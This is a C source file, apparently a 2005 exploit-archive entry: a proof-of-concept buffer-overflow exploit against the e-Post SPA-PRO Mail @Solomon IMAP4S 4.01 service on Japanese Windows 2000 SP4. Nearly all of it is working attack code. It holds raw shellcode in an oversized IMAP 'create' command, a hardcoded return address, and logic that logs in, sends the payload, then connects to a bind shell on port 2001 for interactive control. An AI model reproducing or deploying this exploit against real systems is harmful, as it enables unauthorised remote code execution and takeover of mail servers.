Upload 212 files

497f2f3 verified over 1 year ago

8.14 kB

	//**************************************************************************
	// e-Post SPA-PRO Mail @Solomon SPA-IMAP4S 4.01 Service Buffer Overflow
	// Vulnerability
	//
	// Bind Shell POC Exploit for Japanese Win2K SP4
	// 31 May 2005
	//
	// This POC code binds shell on port 2001 of a vulnerable e-Post
	// SPA-PRO Mail @Solomon IMAP server.
	//
	// This POC assumes default mailbox configuration C:\mail\inbox\%USERNAME%
	// Any changes to the mailbox configuration will cause this POC to
	// fail due to the length differences.
	//
	//
	// Advisory
	// http://www.security.org.sg/vuln/spa-promail4.html
	// http://www.security.org.sg/vuln/spa-promail4-jp.html
	//
	//**************************************************************************

	#include <stdio.h>
	#include <conio.h>
	#include <winsock2.h>
	#include <windows.h>
	#pragma comment (lib,"ws2_32.lib")


	unsigned char expBuf[] =
	"2 create \""
	"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
	"\x55\x8B\xEC\x33\xC9\x66\xB9\xE8\x03\x2B\xE1\x32\xC0\x8B\xFC\xF3"
	"\xAA\xB1\x30\x64\x8B\x01\x8B\x40\x0C\x8B\x70\x1C\xAD\x8B\x70\x08"
	"\xD9\xEE\xD9\x74\x24\xF4\x5F\x83\xC7\x0C\xEB\x53\x60\x8B\x6C\x24"
	"\x24\x8B\x75\x3C\x8B\x74\x35\x78\x03\xF5\x8B\x7E\x20\x03\xFD\x8B"
	"\x4E\x18\x56\x33\xDB\x8B\x37\x03\xF5\x33\xC0\x99\xAC\x85\xC0\x74"
	"\x07\xC1\xCA\x0D\x03\xD0\xEB\xF4\x3B\x54\x24\x2C\x74\x09\x83\xC7"
	"\x04\x43\xE2\xE1\x5E\xEB\x16\x5E\x8B\x7E\x24\x03\xFD\x66\x8B\x04"
	"\x5F\x8B\x7E\x1C\x03\xFD\x8B\x04\x87\x01\x44\x24\x24\x61\xC3\x89"
	"\x75\xF4\x68\x8E\x4E\x0E\xEC\x56\xFF\xD7\x59\x33\xC0\x66\xB8\x6C"
	"\x6C\x50\x68\x33\x32\x2E\x64\x68\x77\x73\x32\x5F\x54\xFF\xD1\x8B"
	"\xF0\x68\xD9\x09\xF5\xAD\x56\xFF\xD7\x5B\x83\xC4\x20\x6A\x01\x6A"
	"\x02\xFF\xD3\x89\x45\xD0\x68\xA4\x1A\x70\xC7\x56\xFF\xD7\x5B\x33"
	"\xC0\x50\xB8\xFD\xFF\xF8\x2E\x83\xF0\xFF\x50\x8B\xC4\x6A\x10\x50"
	"\xFF\x75\xD0\xFF\xD3\x68\xA4\xAD\x2E\xE9\x56\xFF\xD7\x5B\xFF\x75"
	"\xD0\xFF\xD3\x8B\xCC\x6A\x10\x8B\xDC\x68\x35\x54\x8A\xA1\x56\xFF"
	"\xD7\x5A\x50\x50\x53\x51\xFF\x75\xD0\xFF\xD2\x8B\xD0\x68\xE7\x79"
	"\xC6\x79\x56\xFF\xD7\x58\x89\x45\xF0\x8B\x75\xF4\x83\xC4\x20\xC6"
	"\x04\x24\x44\xC6\x44\x24\x2D\x01\x89\x54\x24\x38\x89\x54\x24\x3C"
	"\x89\x54\x24\x40\x8B\xC4\x8D\x58\x44\x68\x72\xFE\xB3\x16\x56\xFF"
	"\xD7\x5A\xB9\xFF\x63\x6D\x64\xC1\xE9\x08\x51\x8B\xCC\x53\x53\x50"
	"\x33\xC0\x50\x50\x50\x6A\x01\x50\x50\x51\x50\xFF\xD2\x5B\x68\xAD"
	"\xD9\x05\xCE\x56\xFF\xD7\x58\x6A\xFF\xFF\x33\xFF\xD0\xFF\x74\x24"
	"\x48\xFF\x55\xF0\xFF\x75\xD0\xFF\x55\xF0\x68\xEF\xCE\xE0\x60\x56"
	"\xFF\xD7\x58\xFF\xD0\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\xe9\x4f\xfe\xff\xff\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41"
	"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x54\x54\x54\x54"
	"\x55\x55\x55\x55\x56\x56\x56\x56\x57\x57\x57\x57\xE9\x0C\xFE\xFF"
	"\xFF\xCC\xEB\xa0\x5A\xD6\x19\xF8\x74\x41\x41\x41\x42\x42\x42\x42"
	"\x43\x43\x43\x43\x44\x44\x44\x44\x45\x45\x45\x45\x46\x46\x46\x46"
	"\x47\x47\x47\x47\x48\x48\x48\x48\x36\x49\x49\x49\x4A\x4A\x4A\x4A"
	"\x4B\x4B\x4B\x4B\x4C\x4C\x4C\x4C\x4D\x4D\x4D\x4D\x4E\x4E\x4E\x4E"
	"\x4F\x4F\x4F\x4F\x50\x50\x50\x50\x51\x51\x51\x51\x52\x52\x52\x52"
	"\x53\x53\x53\x53\x54\x54\x54\x54\x55\x55\x55\x55\x56\x56\x56\x56"
	"\x57\x57\x57\x57\x58\x58\x58\x58\x59\x59\x59\x59\x5A\x5A\x5A\x5A"
	"\"\r\n";


	void shell(int sockfd)
	{
	char buffer[1024];
	fd_set rset;
	FD_ZERO(&rset);

	for(;;)
	{
	if(kbhit() != 0)
	{
	fgets(buffer, sizeof(buffer) - 2, stdin);
	send(sockfd, buffer, strlen(buffer), 0);
	}

	FD_ZERO(&rset);
	FD_SET(sockfd, &rset);

	timeval tv;
	tv.tv_sec = 0;
	tv.tv_usec = 50;

	if(select(0, &rset, NULL, NULL, &tv) == SOCKET_ERROR)
	{
	printf("select error\n");
	break;
	}

	if(FD_ISSET(sockfd, &rset))
	{
	int n;

	ZeroMemory(buffer, sizeof(buffer));
	if((n = recv(sockfd, buffer, sizeof(buffer), 0)) <= 0)
	{
	printf("EOF\n");
	return;
	}
	else
	{
	fwrite(buffer, 1, n, stdout);
	}
	}
	}
	}


	#define ADDR_POSITION 534
	#define RET_ADDR 0x74F819D6 // CALL EBX in Japanese Win2K SP4

	// First short jump backwards. (EB AO)
	// You should know what to change here, landing onto INT 3 to let debugger kick in.
	#define FIRST_BACKJMP_INST 0x5AA0EBCC


	int main(int argc, char* argv[])
	{
	WORD wVersionRequested;
	WSADATA wsaData;
	struct sockaddr_in sin;
	int err;
	char inBuffer[10000];
	char loginBuf[1000];

	if(argc != 4)
	{
	printf("\nUsage: %s <imap username> <imap password> <ip addr>\n", argv[0]);
	return 1;
	}

	if(strlen(argv[1]) <= 0 \|\| strlen(argv[1]) > 20)
	{
	printf("\nInvalid IMAP username! Maximum username length is 20.\n");
	return 1;
	}

	if(strlen(argv[2]) <= 0 \|\| strlen(argv[2]) > 14)
	{
	printf("\nInvalid IMAP password! Maximum password length is 14.\n");
	return 1;
	}

	memset(loginBuf, 0, sizeof(loginBuf));
	_snprintf(loginBuf, sizeof(loginBuf), "1 login \"%s\" \"%s\"\r\n", argv[1], argv[2]);
	loginBuf[sizeof(loginBuf)-1] = 0;

	int retPos = ADDR_POSITION - (strlen(argv[1]) - 1);

	((DWORD )&expBuf[retPos]) = RET_ADDR;
	((DWORD )&expBuf[retPos-4]) = FIRST_BACKJMP_INST;


	wVersionRequested = MAKEWORD(2,0);
	err = WSAStartup(wVersionRequested, &wsaData);
	if(err != 0)
	{
	printf("\nWSAStartup Error.\n");
	return 1;
	}

	if(LOBYTE(wsaData.wVersion) != 2 \|\| HIBYTE(wsaData.wVersion) != 0)
	{
	printf("\nWinsock Version Error\n");
	WSACleanup();
	return 1;
	}

	SOCKET s = WSASocket(AF_INET, SOCK_STREAM, 0, NULL, 0, 0);

	sin.sin_addr.s_addr = inet_addr(argv[3]);
	sin.sin_family = AF_INET;
	sin.sin_port = htons(143);

	printf("\n[+] Trying to connect to %s\n", inet_ntoa(sin.sin_addr));

	if(connect(s, (sockaddr *)&sin, sizeof(sin)) != SOCKET_ERROR)
	{
	int size;

	// read IMAP banner
	size = recv(s, inBuffer, sizeof(inBuffer), 0);
	if(size == SOCKET_ERROR)
	{
	printf("[-] Error receiving IMAP banner!\n");
	return 1;
	}

	printf("[+] IMAP banner received!\n\n");
	fwrite(inBuffer, 1, size, stdout);
	printf("\n");

	if(send(s, (char )loginBuf, strlen((char )loginBuf), 0) == SOCKET_ERROR)
	{
	printf("[-] Error sending login!\n");
	return 1;
	}

	printf("[+] Login Sent.\n");

	size = recv(s, inBuffer, sizeof(inBuffer), 0);
	if(size == SOCKET_ERROR)
	{
	printf("[-] Error receiving login reply!\n");
	return 1;
	}
	if(strstr(inBuffer, "OK"))
	printf("[+] Login successful!\n");
	else
	{
	printf("[+] Login failed!\n");
	return 1;
	}

	if(send(s, (char )expBuf, strlen((char )expBuf), 0) == SOCKET_ERROR)
	{
	printf("[-] Error sending exploit!\n");
	return 1;
	}
	else
	{
	printf("[+] Exploit sent!\n");
	}

	Sleep(2000);

	//================================= Connect to the target ==============================
	SOCKET sock = socket(AF_INET, SOCK_STREAM, 0);
	if(sock == INVALID_SOCKET)
	{
	printf("Invalid socket return in socket() call.\n");
	WSACleanup();
	return -1;
	}

	sin.sin_family = AF_INET;
	sin.sin_port = htons(2001);
	sin.sin_addr.s_addr = inet_addr(argv[3]);

	if(connect(sock, (sockaddr *)&sin, sizeof(sin)) == SOCKET_ERROR)
	{
	printf("Exploit Failed. SOCKET_ERROR return in connect call.\n");
	closesocket(sock);
	WSACleanup();
	return -1;
	}

	printf("[+] Exploit successful!\n\n");
	shell(sock);
	closesocket(sock);
	}
	else
	{
	printf("[-] Cannot connect!\n");
	}

	closesocket(s);
	WSACleanup();

	return 0;
	}

	// milw0rm.com [2005-06-02]